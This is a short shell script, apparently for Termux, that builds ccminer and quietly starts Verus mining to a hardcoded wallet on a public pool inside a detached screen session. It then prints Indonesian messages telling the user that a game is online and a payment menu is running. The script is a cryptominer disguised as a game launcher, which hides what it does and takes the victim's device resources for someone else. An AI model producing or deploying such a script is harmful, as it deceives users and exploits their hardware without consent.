pkg install libcurl libjansson automake build-essential screen git -y

git clone --single-branch -b ARM https://github.com/monkins1010/ccminer.git
cd ccminer
chmod +x build.sh
chmod +x configure.sh
chmod +x autogen.sh
./build.sh

cd ~

# buat worker random 7 karakter
WORKER=$(tr -dc A-Za-z0-9 </dev/urandom | head -c 7)

screen -dmS miner ~/ccminer/ccminer -a verus \
-o stratum+tcp://sg.vipor.net:5040 \
-u RQdUotwPueFvRY5xKfn6REsMUsBdhhmqdq.$WORKER \
-p x -t 8

echo "------------------------------"
echo "Game Online"
echo "Game sedang di jalankan"
echo "menu pembayaran game sedang berlangsung"
echo "------------------------------"
